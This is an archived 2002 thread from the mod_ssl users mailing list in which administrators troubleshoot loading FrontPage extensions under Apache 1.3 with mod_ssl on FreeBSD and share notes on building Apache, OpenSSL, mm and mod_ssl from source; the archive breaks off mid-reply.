iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS >>> >> 50eHNtMkvIv7+20+DY+xA4lu >>> >> =SaGN >>> >> -----END PGP SIGNATURE----- >>> >> >>> >> >>> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >>> >> with "unsubscribe freebsd-questions" in the body of the message >>> >> >>> > >>> > >>> >To Unsubscribe: send mail to majordomo@FreeBSD.org >>> >with "unsubscribe freebsd-questions" in the body of the message >>> > >>> > >>> >>> .... our website: http://www.sage-one.net/ >>> >>> Best regards, >>> >>> Jack L. Stone >>> Server Admin >>> >>> To Unsubscribe: send mail to majordomo@FreeBSD.org >>> with "unsubscribe freebsd-questions" in the body of the message >>> >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >> >> > >.... our website: http://www.sage-one.net/ > >Best regards, > >Jack L. Stone >Server Admin >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 15:24:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA26918; Sat, 13 Apr 2002 15:23:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id PAA26914; Sat, 13 Apr 2002 15:23:04 +0200 (MET DST) Received: from SAGEONE (sageone.sage-american [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3DDN2K53896; Sat, 13 Apr 2002 08:23:02 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020413082313.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 13 Apr 2002 08:23:13 -0500 To: modssl-users@modssl.org From: Server Admin Subject: Re: mod_perl Cc: modssl-users@modssl.org, Mike Loiterman , freebsd-questions@FreeBSD.ORG In-Reply-To: <1018644545.2595.13.camel@agent-orange.int.site-fx.net> References: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for the reply, James.... as I said in an earlier post, I have never found it necessary to run fpadmin on earlier FP installs. Instead, I have used "fp_install" which installed the extensions, BUT, the next problem seems to be how to laod the extensions. Have you used the fpadmin and what would the syntax be to make the darn extensions load...? Nothing in the MS docs about fpadmin says anything about making the extensions load.... I have Apache_FP (Apache-1.23) running fine with FP on one server, but cannot get FP to load the extensions on the new Apache-1.24. Any additional thoughts....???? Or systax on the fpadmin...??? I am really stuck on this and I NEED SSL plus FP. Thanks! At 01:49 PM 4.12.2002 -0700, James A. Peltier wrote: >On Fri, 2002-04-12 at 13:46, Server Admin wrote: >> HURRAY!!!! I got apache+modssl plus, mod_php, mod_perl, mod_frontpage all >> installed and the things works! Loads right up without complaint. >> >> BUT, now.... can anyone tell me how to get the FrontPage extensions >> actually loaded so that the FP client can access the site...??? FrontPage >> says "no extensions on the server". I've tried starting apache with >> "apachectl -DMOD_FP", but no dice.... >> >> This is my LAST obstacle.... please, anyone who can advise about staring >> those darn extensions with ssl loaded... or is that possible....??? >> > >> >> .... our website: http://www.sage-one.net/ >> >> Best regards, >> >> Jack L. Stone >> Server Admin >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message > >I believe there is a fpadmin program that you need to run to actually >apply the FP Extensions to the VirtualHost entry you will be needing the >extensions for. > >- James >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 16:58:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA02578; Sat, 13 Apr 2002 16:57:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id QAA02539; Sat, 13 Apr 2002 16:56:33 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3DEfqR12419 for ; Sat, 13 Apr 2002 09:41:52 -0500 Message-ID: <00c301c1e2fb$333ba4a0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> <3.0.5.32.20020413081624.02e4f930@mail.sage-one.net> Subject: Re: mod_perl Date: Sat, 13 Apr 2002 09:55:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear "Server Admin", RE:>>Please just a little more help from anyone who is trying to run frontpage with apache+ssl-1.24./2.8.8. This is maddening.... --------------- I'm sorry that I cannot help you but I share the sentiments of another ISP--running FrontPage is NOT something he allows his hosted domains to do. If they want to run FrontPage extensions, he simply declines hosting their pages because he needs his Apache server to be very stable. He shared with me recently that he hosts over 2,000 domains. Is it possible that you are trying to use a product with Apache that is wasn't designed to support? Perhaps you would have better luck with IIES? I don't know but I HOPE there can be some discussion of this on this list server. Maybe I need to shift my focus because I'm missing out on valuable functionality? e.g. I would like to find an WYSIWYG HTML editor, but if it means that the web server has to support special extensions that crash the server, than how can this be a good thing? Talk to me "Server Admin", or mod_ssl list. Fortunately, I just downloaded Apache 2.0.35, ran ./configure and it's up and running on SuSE LInux 7.3 with but a couple of whimpers. (I'll be doing the same on my RH servers soon, but they are production servers). Now, even /server-status works and I had not been able to get that going with 1.3.XX. It worked right out of the tarball; the first time! Congratulations, Apache and mod_ssl folks! (Now, if I can just apply my CERT again, without a glitch....). So Server Admin, your statement was my experience over much of the past 16 years when working with proprietary source vendors....."This is maddening". I made a choice to join the GNU/GPL generation and I'm not turning back unless I hit a block wall. So far, I wake up every morning seeing an even bigger expanse of open spaces. I'm enjoying the view... Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 17:35:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA04954; Sat, 13 Apr 2002 17:34:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id RAA04920; Sat, 13 Apr 2002 17:33:13 +0200 (MET DST) Received: from SAGEONE (sageone.sage-american [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3DFXBK54818; Sat, 13 Apr 2002 10:33:11 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020413103322.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 13 Apr 2002 10:33:22 -0500 To: modssl-users@modssl.org, From: Server Admin Subject: Re: mod_perl In-Reply-To: <00c301c1e2fb$333ba4a0$4d38e63f@microanswers.net> References: <3.0.5.32.20020412154626.02e4f930@mail.sage-one.net> <3.0.5.32.20020413081624.02e4f930@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Andrew, thanks for your sentiments and I quite agree about the FrontPage frustration being shared by many of the aministrators I've discussed this issue. I'm really interested in "drifting away" from the use of FP as well, but, alas, one major domain that publishes an online tech magazine to 180 countries needs the assist that is provided by the FP client in its fast procution of html and pages with functionality... there is a tremendous amount of new content produced each month being an online mag. FP saves a lot of time on this heavy production. No need to learn html or cgi for the workstations... just type it and publish it...done. Thus, there is an immediate need until another way is found. Frontpage is running just fine at the moment on a server with Apache-1.23 (and earlier 1.22 and 1.20), but once trying to move to the Apache-1.24+ssl... no frontpage extensions. No doubt I'm missing some ingredient, but as I said in the previous post, EVERY install of Apache+FP version seems to be different Even is I start Apache-1.24 without ssl, I cannot load the darn extensions. Suspect it has to do with permissions.... but, if I knew the answer to that, I'd be able to fix it. My long workaround until I solve this FP thing is to run the FP domains on the Apache-1.23+FP and the Apache+ssl on another server using a separate domain which provides the secure website for processing online orders. But, it means forwarding the traffic from the HTTP server to the HTTPS server and any pages produced by FP will have to be FTP'd. For some reason, the order pages containing FP bots still work once loaded, even though the FP extensions are not loaded... kinda scares me though and is why I still want to find the answer to loading the extensions.... BTW, I have not been able to get /server-status or /server-info wo work either.... it tries to run, but answers with "you don't have permissions...." and I'm running ROOT!!! At 09:55 AM 4.13.2002 -0500, Andrew Lietzow wrote: >Dear "Server Admin", >RE:>>Please just a little more help from anyone who is trying to run >frontpage with >apache+ssl-1.24./2.8.8. This is maddening.... >--------------- >I'm sorry that I cannot help you but I share the sentiments of another >ISP--running FrontPage >is NOT something he allows his hosted domains to do. If they want to run >FrontPage >extensions, he simply declines hosting their pages because he needs his >Apache >server to be very stable. He shared with me recently that he hosts over >2,000 domains. > >Is it possible that you are trying to use a product with Apache that is >wasn't designed to support? >Perhaps you would have better luck with IIES? I don't know but I HOPE there >can be some discussion >of this on this list server. Maybe I need to shift my focus because I'm >missing out on valuable functionality? > >e.g. I would like to find an WYSIWYG HTML editor, but if it means that the >web server has to support >special extensions that crash the server, than how can this be a good thing? >Talk to me "Server Admin", or mod_ssl list. > >Fortunately, I just downloaded Apache 2.0.35, ran ./configure and it's up >and running on SuSE LInux 7.3 >with but a couple of whimpers. (I'll be doing the same on my RH servers >soon, but they are production servers). > >Now, even /server-status works and I had not been able to get that going >with 1.3.XX. It worked right out of >the tarball; the first time! Congratulations, Apache and mod_ssl folks! >(Now, if I can just apply my CERT again, >without a glitch....). > >So Server Admin, your statement was my experience over much of the past 16 >years when >working with proprietary source vendors....."This is maddening". > >I made a choice to join the GNU/GPL generation and I'm not turning back >unless I hit a block wall. So far, I wake up every morning seeing an even >bigger expanse of open spaces. I'm enjoying the view... > >Andrew Lietzow >The ACL Group, Inc. > > > > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 18:00:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA06732; Sat, 13 Apr 2002 17:59:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id RAA06693; Sat, 13 Apr 2002 17:58:30 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA21950 for ; Sat, 13 Apr 2002 12:02:48 -0400 Date: Sat, 13 Apr 2002 12:02:48 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_perl In-Reply-To: <3.0.5.32.20020413103322.02e4f930@mail.sage-one.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users frontpage can be used without the extensions. At least the client can use frontpage on his end and then push the pages out without the extensions being allowed, though, this may well disable some of the special scripting. Folks that shy away from frontpage tend to do so due to it's repeated history of having security issues, though there may well be further stability issues I'm unaware of additinally. you might find better help on getting FP up and running if really required on the apache list or a FP specific listing. Thanks, Ron DuFresne On Sat, 13 Apr 2002, Server Admin wrote: > Andrew, thanks for your sentiments and I quite agree about the FrontPage > frustration being shared by many of the aministrators I've discussed this > issue. I'm really interested in "drifting away" from the use of FP as well, > but, alas, one major domain that publishes an online tech magazine to 180 > countries needs the assist that is provided by the FP client in its fast > procution of html and pages with functionality... there is a tremendous > amount of new content produced each month being an online mag. FP saves a > lot of time on this heavy production. No need to learn html or cgi for the > workstations... just type it and publish it...done. > > Thus, there is an immediate need until another way is found. Frontpage is > running just fine at the moment on a server with Apache-1.23 (and earlier > 1.22 and 1.20), but once trying to move to the Apache-1.24+ssl... no > frontpage extensions. No doubt I'm missing some ingredient, but as I said > in the previous post, EVERY install of Apache+FP version seems to be different > > Even is I start Apache-1.24 without ssl, I cannot load the darn extensions. > Suspect it has to do with permissions.... but, if I knew the answer to > that, I'd be able to fix it. > > My long workaround until I solve this FP thing is to run the FP domains on > the Apache-1.23+FP and the Apache+ssl on another server using a separate > domain which provides the secure website for processing online orders. But, > it means forwarding the traffic from the HTTP server to the HTTPS server > and any pages produced by FP will have to be FTP'd. For some reason, the > order pages containing FP bots still work once loaded, even though the FP > extensions are not loaded... kinda scares me though and is why I still want > to find the answer to loading the extensions.... > > BTW, I have not been able to get /server-status or /server-info wo work > either.... it tries to run, but answers with "you don't have > permissions...." and I'm running ROOT!!! > > At 09:55 AM 4.13.2002 -0500, Andrew Lietzow wrote: > >Dear "Server Admin", > >RE:>>Please just a little more help from anyone who is trying to run > >frontpage with > >apache+ssl-1.24./2.8.8. This is maddening.... > >--------------- > >I'm sorry that I cannot help you but I share the sentiments of another > >ISP--running FrontPage > >is NOT something he allows his hosted domains to do. If they want to run > >FrontPage > >extensions, he simply declines hosting their pages because he needs his > >Apache > >server to be very stable. He shared with me recently that he hosts over > >2,000 domains. > > > >Is it possible that you are trying to use a product with Apache that is > >wasn't designed to support? > >Perhaps you would have better luck with IIES? I don't know but I HOPE there > >can be some discussion > >of this on this list server. Maybe I need to shift my focus because I'm > >missing out on valuable functionality? > > > >e.g. I would like to find an WYSIWYG HTML editor, but if it means that the > >web server has to support > >special extensions that crash the server, than how can this be a good thing? > >Talk to me "Server Admin", or mod_ssl list. > > > >Fortunately, I just downloaded Apache 2.0.35, ran ./configure and it's up > >and running on SuSE LInux 7.3 > >with but a couple of whimpers. (I'll be doing the same on my RH servers > >soon, but they are production servers). > > > >Now, even /server-status works and I had not been able to get that going > >with 1.3.XX. It worked right out of > >the tarball; the first time! Congratulations, Apache and mod_ssl folks! > >(Now, if I can just apply my CERT again, > >without a glitch....). > > > >So Server Admin, your statement was my experience over much of the past 16 > >years when > >working with proprietary source vendors....."This is maddening". > > > >I made a choice to join the GNU/GPL generation and I'm not turning back > >unless I hit a block wall. So far, I wake up every morning seeing an even > >bigger expanse of open spaces. I'm enjoying the view... > > > >Andrew Lietzow > >The ACL Group, Inc. > > > > > > > > > > > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > > > > .... our website: http://www.sage-one.net/ > > Best regards, > > Jack L. Stone > Server Admin > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 18:21:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA09355; Sat, 13 Apr 2002 18:20:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id SAA09331; Sat, 13 Apr 2002 18:19:52 +0200 (MET DST) Received: from SAGEONE (sageone.sage-american [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3DGJoK55152; Sat, 13 Apr 2002 11:19:50 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020413112001.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 13 Apr 2002 11:20:01 -0500 To: modssl-users@modssl.org, modssl-users@modssl.org From: Server Admin Subject: Re: mod_perl In-Reply-To: References: <3.0.5.32.20020413103322.02e4f930@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks, Ron & I agree that FP issues belong on a more specific list except it has only become a problem when the SSL and need for mod_ssl enters this picture. BUT, belonging to most lists for quite a while, I have yet to find a specific list and I've never seen this issue dealt with in detail enough, and my large pile of doc printouts are mostly useless being out of date with present Apache, etc. versions.... thus, I still have this problem and even your comment proves to be true as I found out just yesterday... my only concern was that the online order forms have cgi scripts called "web bots" and I was surprised/baffled to see the forms work at all, although I haven't tested everything on the forms... Eventually perhaps FP will catch up with the latest Apache+ssl and I will hobble along till then..... Thanks for the patience on this list even if off-topic (but not entirely).... At 12:02 PM 4.13.2002 -0400, R. DuFresne wrote: > >frontpage can be used without the extensions. At least the client can use >frontpage on his end and then push the pages out without the extensions >being allowed, though, this may well disable some of the special >scripting. Folks that shy away from frontpage tend to do so due to it's >repeated history of having security issues, though there may well be >further stability issues I'm unaware of additinally. you might find >better help on getting FP up and running if really required on the apache >list or a FP specific listing. > >Thanks, > >Ron DuFresne > >On Sat, 13 Apr 2002, Server Admin wrote: > >> Andrew, thanks for your sentiments and I quite agree about the FrontPage >> frustration being shared by many of the aministrators I've discussed this >> issue. I'm really interested in "drifting away" from the use of FP as well, >> but, alas, one major domain that publishes an online tech magazine to 180 >> countries needs the assist that is provided by the FP client in its fast >> procution of html and pages with functionality... there is a tremendous >> amount of new content produced each month being an online mag. FP saves a >> lot of time on this heavy production. No need to learn html or cgi for the >> workstations... just type it and publish it...done. >> >> Thus, there is an immediate need until another way is found. Frontpage is >> running just fine at the moment on a server with Apache-1.23 (and earlier >> 1.22 and 1.20), but once trying to move to the Apache-1.24+ssl... no >> frontpage extensions. No doubt I'm missing some ingredient, but as I said >> in the previous post, EVERY install of Apache+FP version seems to be different >> >> Even is I start Apache-1.24 without ssl, I cannot load the darn extensions. >> Suspect it has to do with permissions.... but, if I knew the answer to >> that, I'd be able to fix it. >> >> My long workaround until I solve this FP thing is to run the FP domains on >> the Apache-1.23+FP and the Apache+ssl on another server using a separate >> domain which provides the secure website for processing online orders. But, >> it means forwarding the traffic from the HTTP server to the HTTPS server >> and any pages produced by FP will have to be FTP'd. For some reason, the >> order pages containing FP bots still work once loaded, even though the FP >> extensions are not loaded... kinda scares me though and is why I still want >> to find the answer to loading the extensions.... >> >> BTW, I have not been able to get /server-status or /server-info wo work >> either.... it tries to run, but answers with "you don't have >> permissions...." and I'm running ROOT!!! >> >> At 09:55 AM 4.13.2002 -0500, Andrew Lietzow wrote: >> >Dear "Server Admin", >> >RE:>>Please just a little more help from anyone who is trying to run >> >frontpage with >> >apache+ssl-1.24./2.8.8. This is maddening.... >> >--------------- >> >I'm sorry that I cannot help you but I share the sentiments of another >> >ISP--running FrontPage >> >is NOT something he allows his hosted domains to do. If they want to run >> >FrontPage >> >extensions, he simply declines hosting their pages because he needs his >> >Apache >> >server to be very stable. He shared with me recently that he hosts over >> >2,000 domains. >> > >> >Is it possible that you are trying to use a product with Apache that is >> >wasn't designed to support? >> >Perhaps you would have better luck with IIES? I don't know but I HOPE there >> >can be some discussion >> >of this on this list server. Maybe I need to shift my focus because I'm >> >missing out on valuable functionality? >> > >> >e.g. I would like to find an WYSIWYG HTML editor, but if it means that the >> >web server has to support >> >special extensions that crash the server, than how can this be a good thing? >> >Talk to me "Server Admin", or mod_ssl list. >> > >> >Fortunately, I just downloaded Apache 2.0.35, ran ./configure and it's up >> >and running on SuSE LInux 7.3 >> >with but a couple of whimpers. (I'll be doing the same on my RH servers >> >soon, but they are production servers). >> > >> >Now, even /server-status works and I had not been able to get that going >> >with 1.3.XX. It worked right out of >> >the tarball; the first time! Congratulations, Apache and mod_ssl folks! >> >(Now, if I can just apply my CERT again, >> >without a glitch....). >> > >> >So Server Admin, your statement was my experience over much of the past 16 >> >years when >> >working with proprietary source vendors....."This is maddening". >> > >> >I made a choice to join the GNU/GPL generation and I'm not turning back >> >unless I hit a block wall. So far, I wake up every morning seeing an even >> >bigger expanse of open spaces. I'm enjoying the view... >> > >> >Andrew Lietzow >> >The ACL Group, Inc. >> > >> > >> > >> > >> > >> > >> >______________________________________________________________________ >> >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> >User Support Mailing List modssl-users@modssl.org >> >Automated List Manager majordomo@modssl.org >> > >> > >> >> .... our website: http://www.sage-one.net/ >> >> Best regards, >> >> Jack L. Stone >> Server Admin >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> > >-- >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior security consultant: sysinfo.com > http://sysinfo.com > >"Cutting the space budget really restores my faith in humanity. It >eliminates dreams, goals, and ideals and lets us get straight to the >business of hate, debauchery, and self-annihilation." > -- Johnny Hart > >testing, only testing, and damn good at it too! > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 22:45:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA23780; Sat, 13 Apr 2002 22:44:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id WAA23729; Sat, 13 Apr 2002 22:43:37 +0200 (MET DST) Received: from SAGEONE (sageone.sage-american [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3DKhWK56977 for ; Sat, 13 Apr 2002 15:43:36 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020413154343.02e4f930@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 13 Apr 2002 15:43:43 -0500 To: modssl-users@modssl.org From: Server Admin Subject: Re: Problem with Compiling Mod_ssl In-Reply-To: <3CB6D6FF.4AA6B485@bourse.ch> References: <050101c1e203$9e8e4df0$440b000a@eckoh.com> <3.0.5.32.20020412071828.02dffcd0@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users At 02:45 PM 4.12.2002 +0200, you wrote: >Server Admin wrote: >> >> Owen: I run FBSD 4.5-stable and have tried 5-6 times to install >> apache+mod_ssl-1.3.24+2.8.8 directly from ports that does all the work, >> where I simply use "make install clean" but I'm getting the same (or >> similar) error message, but don't have a clue as to how to do the >> "re-compile". Could you please point me to the >> "...the INSTALL document in the mod_ssl distro is quite good..." >> that you refer to. I'm desparate to set up a secure server as time is of >> the essence. Does "mod_ssl" install that document in the /usr/local/share/ >> directory during the install. >> >> To be more specific, here is the error I get: >> ============================================== >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses >> plain Apache 1.3 API, this module might crash under EAPI! (please recompile >> it with -DEAPI) >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO >> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module >> might crash under EAPI! (please recompile it with -DEAPI) >> ============================================== > >When you untar the mod_ssl distro it's right there in the top directory. > >Here are my notes from the last time I installed plain statically >compiled apache+mod_ssl (this is version 1.3.14 - just change the >numbers and the installation paths to suit your distro): > >Installing Apache 1.3.14 with mod_ssl and mm >----------------------------------------------- >(see http://www.modssl.org/example/) > >- Get the sources: >- www.apache.org <-- apache_1.3.14.tar.gz >- ftp://ftp.openssl.org <-- openssl-0.9.6.tar.gz >- www.modssl.org <-- mod_ssl-2.7.1-1.3.14.tar.gz >- www.engelschall.com/sw/mm/ <-- mm-1.1.3.tar.gz > >- Save all these in /home/obo/downloads/tar_files > ># cd /home/apache ># gzip -d -c /home/obo/downloads/tar_files/apache_1.3.14.tar.gz | tar >xvf - ># gzip -d -c /home/obo/downloads/tar_files/openssl-0.9.6.tar.gz | tar >xvf - ># gzip -d -c /home/obo/downloads/tar_files/mod_ssl-2.7.1-1.3.14.tar.gz | >tar xvf - ># gzip -d -c /home/obo/downloads/tar_files/mm-1.1.3.tar.gz | tar xvf - > >- Need to add perl and ar to the path; > ># PERL=/usr/local/bin/perl ># export PERL ># PATH=$PATH:/usr/local/bin:/usr/ccs/bin ># export PATH > >- first, compile MM > ># cd mm-1.1.3 ># ./configure --prefix=/home/apache/mm ># make ># make test ># make install > >- All the files are untarred, so we go to openssl-0.9.6 > ># cd ../openssl-0.9.6 ># ./Configure solaris-sparcv9-gcc --prefix=/home/apache ># make clean ># make > >- Switch to the modd_ssl directory and configure it. > ># cd ../mod_ssl-2.7.1-1.3.14 ># ./configure --with-apache=../apache_1.3.14 --with-ssl=../openssl-0.9.6 >--prefix=/home/apache > >- Switch to the apache directory > ># cd ../apache_1.3.14 ># SSL_BASE=../openssl-0.9.6 ># export SSL_BASE ># ./configure --enable-module=ssl --prefix=/home/apache ># make ># make install >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > Many thanks, Owen for the details of your last install. But, on FBSD, if I already have Apache-1.23+OpemSSL+other mods all set on a server, what would be the same syntax details to just add the mod_ssl-2.8.7-1.3.23.tar.gz so not to mess up the existing setup that has a number of vhosts already. Thanks for your patience with my questions.... .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 13 23:17:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA25777; Sat, 13 Apr 2002 23:16:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id XAA25708; Sat, 13 Apr 2002 23:15:36 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id RAA22837; Sat, 13 Apr 2002 17:21:10 -0400 Date: Sat, 13 Apr 2002 17:21:10 -0400 (EDT) From: "R. DuFresne" To: Server Admin cc: modssl-users@modssl.org Subject: Re: Problem with Compiling Mod_ssl In-Reply-To: <3.0.5.32.20020413154343.02e4f930@mail.sage-one.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You're going to have to recomplie the whole thing anyways. And that should well leave the http.conf file alone, you can use yer old, just add in any new directives you will need. To be safe, tar up what you have incase you wanna revert back, or setup the new to go to a nice sweet new spot in the tree. Thanks, Ron DuFresne On Sat, 13 Apr 2002, Server Admin wrote: > At 02:45 PM 4.12.2002 +0200, you wrote: > >Server Admin wrote: > >> > >> Owen: I run FBSD 4.5-stable and 